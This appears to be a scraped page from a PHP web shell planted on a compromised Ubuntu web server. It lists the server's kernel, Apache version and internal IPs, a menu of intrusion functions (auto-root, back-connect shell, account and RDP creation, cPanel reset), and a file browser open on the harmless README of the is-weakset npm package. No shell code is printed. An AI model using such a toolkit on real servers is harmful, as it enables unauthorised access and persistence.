Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
is-weakset /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxrwxr-x
test
[ DIR ]
drwxrwxr-x
.editorconfig
223
B
-rw-rw-r--
.eslintignore
10
B
-rw-rw-r--
.eslintrc
144
B
-rw-rw-r--
.gitattributes
12
B
-rw-rw-r--
.nycrc
139
B
-rw-rw-r--
CHANGELOG.md
6.89
KB
-rw-rw-r--
LICENSE
1.04
KB
-rw-rw-r--
README.md
1.88
KB
-rw-rw-r--
index.js
801
B
-rw-rw-r--
package.json
1.91
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# is-weakset <sup>[![Version Badge][2]][1]</sup> [![github actions][actions-image]][actions-url] [![coverage][codecov-image]][codecov-url] [![dependency status][5]][6] [![dev dependency status][7]][8] [![License][license-image]][license-url] [![Downloads][downloads-image]][downloads-url] [![npm badge][11]][1] Is this value a JS WeakSet? This module works cross-realm/iframe, and despite ES6 @@toStringTag. ## Example ```js var isWeakSet = require('is-weakset'); assert(!isWeakSet(function () {})); assert(!isWeakSet(null)); assert(!isWeakSet(function* () { yield 42; return Infinity; }); assert(!isWeakSet(Symbol('foo'))); assert(!isWeakSet(1n)); assert(!isWeakSet(Object(1n))); assert(!isWeakSet(new Set())); assert(!isWeakSet(new WeakMap())); assert(!isWeakSet(new Map())); assert(isWeakSet(new WeakSet())); class MyWeakSet extends WeakSet {} assert(isWeakSet(new MyWeakSet())); ``` ## Tests Simply clone the repo, `npm install`, and run `npm test` [1]: https://npmjs.org/package/is-weakset [2]: https://versionbadg.es/inspect-js/is-weakset.svg [5]: https://david-dm.org/inspect-js/is-weakset.svg [6]: https://david-dm.org/inspect-js/is-weakset [7]: https://david-dm.org/inspect-js/is-weakset/dev-status.svg [8]: https://david-dm.org/inspect-js/is-weakset#info=devDependencies [11]: https://nodei.co/npm/is-weakset.png?downloads=true&stars=true [license-image]: https://img.shields.io/npm/l/is-weakset.svg [license-url]: LICENSE [downloads-image]: https://img.shields.io/npm/dm/is-weakset.svg [downloads-url]: https://npm-stat.com/charts.html?package=is-weakset [codecov-image]: https://codecov.io/gh/inspect-js/is-weakset/branch/main/graphs/badge.svg [codecov-url]: https://app.codecov.io/gh/inspect-js/is-weakset/ [actions-image]: https://img.shields.io/endpoint?url=https://github-actions-badge-u3jn4tfpocch.runkit.sh/inspect-js/is-weakset [actions-url]: https://github.com/inspect-js/is-weakset/actions
Close